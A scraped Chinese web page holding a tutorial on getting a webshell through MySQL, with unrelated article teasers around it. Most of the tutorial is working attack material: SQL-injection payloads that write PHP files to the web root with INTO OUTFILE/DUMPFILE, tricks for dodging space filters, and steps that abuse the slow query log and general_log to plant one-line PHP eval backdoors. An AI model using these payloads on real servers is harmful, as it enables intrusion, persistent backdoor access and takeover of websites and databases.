<em>Mac</em>Book项目 2009年学校开始实施<em>Mac</em>Book项目,所有师生配备一本<em>Mac</em>Book,并同步更新了校园无线网络。学校每周进行电脑技术更新,每月发送技术支持资料,极大改变了教学及学习方式。因此2011
2021-06-01 09:32:01
mysql資料庫中getshell的方式總結
2022-07-11 18:04:13
outfile和dumpfile寫shell
利用條件
- 資料庫當前使用者為root許可權;
- 知道當前網站的絕對路徑;
PHP的GPC為 off狀態;(魔術引號,GET,POST,Cookie)- 寫入的那個路徑存在寫入許可權。
基於union聯合查詢:
?id=1 union select 1,'<?php phpinfo();?>',3 into outfile 'C:phpstudywwwshell.php'%23 ?id=1 union select 1,'<?php phpinfo();?>',3 into dumpfile 'C:phpstudywwwshell.php'%23
非聯合查詢
當我們無法使用聯合查詢時,我們可以使用fields terminated by與lines terminated by來寫shell
?id=1 into outfile 'C:phpstudywwwshell.php' FIELDS TERMINATED BY '<?php phpinfo();?>'%23
代替空格的方法
+號,%0a、%0b、%a0 、 /**/ 註釋符等
outfile和dumpfile的區別
outfile:
1、 支援多行資料同時匯出
2、 使用union聯合查詢時,要保證兩側查詢的列數相同
3、 會在換行符製表符後面追加反斜槓
4、會在末尾追加換行
dumpfile:
1、 每次只能匯出一行資料
2、 不會在換行符製表符後面追加反斜槓
3、 不會在末尾追加換行
因此,我們可以使用into dumpfile這個函數來順利寫入二進位制檔案;
當然into outfile函數也可以寫入二進位制檔案,但是無法生效(追加的反斜槓會使二進位制檔案無法生效)
當我們使用dumpfile,應該手動新增 limit 限制,來獲取不同的行數
secure_file_prive
MySQL的secure-file-prive引數是用來限制LOAD DATA, SELECT ,OUTFILE, and LOAD_FILE()傳到哪個指定目錄的。
secure_file_prive= ,結果為空的話,表示允許任何檔案讀寫
secure_file_prive=NULL,表示不允許任何檔案讀寫
secure_file_prive=‘某個路徑’,表示這個路徑作為檔案讀寫的路徑
在mysql5.5版本前,都是預設為空,允許讀取
在mysql5.6版本後 ,預設為NULL,並且無法用
SQL語句對其進行修改。所以這種只能在設定進行修改。
查詢secure_file_prive的引數
show global variables like "%secure%"
利用sql語句修改引數
set global secure_file_prive=
但是5.6後不能利用sql修改了,所以只能利用設定修改
修改value的值:
windows下修改組態檔:mysql.ini
linux修改組態檔:my.cnf
紀錄檔getshell
慢紀錄檔getshell
慢紀錄檔:
一般都是通過long_query_time選項來設定這個時間值,時間以秒為單位,可以精確到微秒。如果查詢時間超過了這個時間值(預設為10秒),這個查詢語句將被記錄到慢查詢紀錄檔中。檢視伺服器預設時間值方式如下:
show global variables like '%long_query_time%' show global variables like '%long%'
檢視慢紀錄檔引數
show global variables like '%slow%'
對慢紀錄檔引數進行修改
set global slow_query_log=1 #開啟慢紀錄檔 set global slow_query_log_file='c:\phpstudy\www\test.php'#慢紀錄檔的路徑 注意:一定要用雙反斜槓 SELECT '<?php @eval($_POST[1]);?>' or sleep(11) 這兒11是超過慢紀錄檔的10秒時間
利用general_log
利用general_log,可以將所有到達mysql伺服器的sql語句,都記錄下來。
相關引數一共有3個:general_log、log_output、general_log_file
show variables like 'general_log'; -- 檢視紀錄檔是否開啟 set global general_log=on; -- 開啟紀錄檔功能 show variables like 'general_log_file'; -- 看看紀錄檔檔案儲存位置 set global general_log_file='tmp/general.lg'; -- 設定紀錄檔檔案儲存位置 show variables like 'log_output'; -- 看看紀錄檔輸出型別 table或file set global log_output='table'; -- 設定輸出型別為 table set global log_output='file'; -- 設定輸出型別為file
一般log_output都是file,就是將紀錄檔存入檔案中。table的話就是將紀錄檔存入資料庫的紀錄檔表中。
getshell
set global general_log=on set global general_log_file='需要攻擊的路徑' select '<?php eval($_POST[cmd]);?>'
這樣就將一句話木馬記錄到general_log中,從而getshell
binlog的介紹
總結
到此這篇關於mysql資料庫中getshell方式的文章就介紹到這了,更多相關mysql getshell的方式內容請搜尋it145.com以前的文章或繼續瀏覽下面的相關文章希望大家以後多多支援it145.com!
相關文章
-
黑科技的輕簡出行,告別「電量焦慮症」:Anker氮化鎵超能充系列
综合看Anker超能充系列的性价比很高,并且与不仅和iPhone12/苹果<em>Mac</em>Book很配,而且适合多设备充电需求的日常使用或差旅场景,不管是安卓还是Switch同样也能用得上它,希望这次分享能给准备购入充电器的小伙伴们有所
2021-06-01 09:31:42
-
吳亦凡廠牌首秀,L4WUDU居然忘詞了,Rapper和明星比還是有差距!
除了L4WUDU与吴亦凡已经多次共事,成为了明面上的厂牌成员,吴亦凡还曾带领20XXCLUB全队参加2020年的一场音乐节,这也是20XXCLUB首次全员合照,王嗣尧Turbo、陈彦希Regi、<em>Mac</em> Ova Seas、林渝植等人全部出场。然而让
2021-06-01 09:31:34
-
IPFS、Chia、Bzz和ICP挖礦該怎麼選?哪一個更有優勢?
目前应用IPFS的机构:1 谷歌<em>浏览器</em>支持IPFS分布式协议 2 万维网 (历史档案博物馆)数据库 3 火狐<em>浏览器</em>支持 IPFS分布式协议 4 EOS 等数字货币数据存储 5 美国国会图书馆,历史资料永久保存在 IPFS 6 加
2021-06-01 09:31:24
-
有哪些事是買了雪佛蘭後才知道的?美事偷著樂,開拓者車主隨聊
开拓者的车机是兼容苹果和<em>安卓</em>,虽然我不怎么用,但确实兼顾了我家人的很多需求:副驾的门板还配有解锁开关,有的时候老婆开车,下车的时候偶尔会忘记解锁,我在副驾驶可以自己开门:第二排设计很好,不仅配置了一个很大的
2021-06-01 09:30:48
-
iPhone12在618最新定價,跌價幅度超過1400元,還等iPhone13嗎?
不仅是<em>安卓</em>手机,苹果手机的降价力度也是前所未有了,iPhone12也“跳水价”了,发布价是6799元,如今已经跌至5308元,降价幅度超过1400元,最新定价确认了。iPhone12是苹果首款5G手机,同时也是全球首款5nm芯片的智能机,它
2021-06-01 09:30:45